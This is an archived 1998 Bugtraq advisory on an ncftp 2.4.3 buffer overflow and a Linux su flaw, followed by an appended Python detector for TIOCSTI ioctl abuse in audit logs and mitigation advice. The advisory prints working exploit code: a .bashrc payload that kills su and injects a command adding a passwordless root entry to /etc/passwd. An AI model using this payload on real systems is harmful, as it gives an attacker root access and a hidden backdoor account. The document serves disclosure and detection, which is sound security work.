Bugtraq mailing list archives
ncftp 2.4.3 overflow / su killing
From: lcamtuf () boss staszic waw pl (Michal Zalewski)
Date: Tue, 24 Mar 1998 17:18:53 +0100
[I posted it already four days ago, but nothing happened]

There is a possible buffer overflow in the new version of ncftp (2.4.3, released a few days ago) - it uses a 512-byte long buffer to store the local working directory (sigh!). You may exploit it by creating e.g. a /TEST directory on an ftp server with a subdirectory e.g. xxx(200)xxx/yyy(200)yyy/zzz(200)zzz. It's sufficient to crash ncftp when the directory is being retrieved using 'get -R /TEST'.

Oh, as an addendum... There's a problem with the Linux su command, as I described a few posts ago (I thought it was ncurses' fault, but I was wrong).

** Big thanks to Nergal for the example of how to pass anything to the shell if we're already controlling terminal input (TIOCSTI). **

If a non-root account is compromised, e.g. with the lynx/ncftp bug, and .bashrc on this non-root account is altered to something like that:

---
cat >/tmp/a.c <<X
#include <sys/ioctl.h>
main(){char C[]="\necho 'nergal::0:0::/:/bin/sh'>>/etc/passwd;logout\n";int i=0, P=getppid();kill(P--,9);kill(P,9);for(;i<strlen(C);i++)ioctl(0,TIOCSTI,C+i);}
X
gcc /tmp/a.c -o/tmp/a;/tmp/a;rm -f /tmp/a ~/.bashrc;clear
--

During the next su session, "echo '...' >>/etc/passwd" will be executed at the root account [hopefully] :)

In general, the problem lies in the ability of an unprivileged process to kill su itself - it will still be able to control terminal i/o, because su, when killed with SIGKILL, performs no tty hangup/reset. So we may pass anything to the privileged shell, or do anything else with the terminal.

So there are 3 bugs: an unprivileged process may kill 'su'; 'su' doesn't perform any tty checks; bash also is careless ;)

Fix: replace Linux su with a smarter one ;)

_______________________________________________________________________
Michal Zalewski [lcamtuf () boss staszic waw pl] <= finger for pub PGP key
To iterate is human, to recurse divine [P. Deutsch]
[echo "\$0&\$0">_;chmod +x _;./_] <=------=> [tel +48 (0) 22 813 25 86]
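The injection primitive the post relies on is ioctl(TIOCSTI) against a terminal that a SIGKILLed su never hung up. From the defender's side, that ioctl is a narrow, auditable event. The following is an added example, not code from the post or from any su/ncftp project: it parses Linux audit SYSCALL records and flags TIOCSTI requests, treating those issued by a non-root uid as the high-severity case described above. It assumes x86_64 syscall numbers (ioctl = 16, arch c000003e), the Linux TIOCSTI request value 0x5412, and an audit rule such as `-a always,exit -F arch=b64 -S ioctl -F a1=0x5412 -F key=tiocsti`; the three log lines are constructed for the example.

```python
"""Flag TIOCSTI terminal-input injection in Linux audit SYSCALL records.

Added example (not part of the Bugtraq post). Assumptions:
  * x86_64 audit records: arch=c000003e, ioctl is syscall 16
  * TIOCSTI request number 0x5412 (asm-generic/ioctls.h)
  * an auditd rule logging ioctl calls, e.g.
      -a always,exit -F arch=b64 -S ioctl -F a1=0x5412 -F key=tiocsti
"""
import re

AUDIT_ARCH_X86_64 = "c000003e"
IOCTL_SYSCALL_X86_64 = 16
TIOCSTI = 0x5412

# Constructed sample records (not real captures):
#  1. a non-root process pushing input into pts0 via TIOCSTI  -> alert
#  2. root doing an unrelated tty ioctl (TCGETS, 0x5401)      -> ignored
#  3. the same non-root process calling kill(2) with signal 9 -> not an ioctl
SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1522000000.101:11): arch=c000003e syscall=16 success=yes exit=0 a0=0 a1=5412 a2=7ffd1c0a5e10 a3=0 items=0 ppid=4242 pid=4243 auid=1000 uid=1000 gid=100 euid=1000 tty=pts0 ses=3 comm="a" exe="/tmp/a" key="tiocsti"
type=SYSCALL msg=audit(1522000000.102:12): arch=c000003e syscall=16 success=yes exit=0 a0=0 a1=5401 a2=7ffd1c0a5e10 a3=0 items=0 ppid=1 pid=500 auid=0 uid=0 gid=0 euid=0 tty=pts1 ses=1 comm="bash" exe="/bin/bash" key=(null)
type=SYSCALL msg=audit(1522000000.103:13): arch=c000003e syscall=62 success=yes exit=0 a0=1092 a1=9 a2=0 a3=0 items=0 ppid=4242 pid=4243 auid=1000 uid=1000 gid=100 euid=1000 tty=pts0 ses=3 comm="a" exe="/tmp/a" key=(null)
"""

# key=value pairs; values are either a double-quoted string or a bare token
TOKEN_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_record(line):
    """Split one audit line into a dict of field -> value (quotes stripped)."""
    return {key: value.strip('"') for key, value in TOKEN_RE.findall(line)}


def is_tiocsti(fields):
    """True when the record is an x86_64 ioctl(2) whose request is TIOCSTI."""
    if fields.get("type") != "SYSCALL" or fields.get("arch") != AUDIT_ARCH_X86_64:
        return False
    try:
        syscall = int(fields.get("syscall", "-1"))
        request = int(fields.get("a1", "-1"), 16)   # audit prints args in hex
    except ValueError:
        return False
    return syscall == IOCTL_SYSCALL_X86_64 and request == TIOCSTI


def find_tiocsti_events(log_text):
    """Return one alert dict per TIOCSTI record found in the audit text."""
    alerts = []
    for line in log_text.splitlines():
        fields = parse_record(line)
        if not is_tiocsti(fields):
            continue
        uid = int(fields.get("uid", "-1"))
        alerts.append({
            "pid": int(fields.get("pid", "-1")),
            "uid": uid,
            "tty": fields.get("tty"),
            "comm": fields.get("comm"),
            "exe": fields.get("exe"),
            # an unprivileged process writing keystrokes into a tty is the
            # pattern from the post; root doing it is unusual but less alarming
            "severity": "high" if uid != 0 else "info",
        })
    return alerts


if __name__ == "__main__":
    for alert in find_tiocsti_events(SAMPLE_AUDIT_LOG):
        print(alert)
```

A rule keyed on the ioctl request number is cheap to run and does not depend on recognising su: any process feeding input to a terminal it did not open is worth a look. Structurally, the fix for the class of bug is for the privileged program to run the target on a freshly allocated pty in its own session rather than sharing the caller's terminal, and Linux 6.2 and later can disable the ioctl outright by setting the `dev.tty.legacy_tiocsti` sysctl to 0.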